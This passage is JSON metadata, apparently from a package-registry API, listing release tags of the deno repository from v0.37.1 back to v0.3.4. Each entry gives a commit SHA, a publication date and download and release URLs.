":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3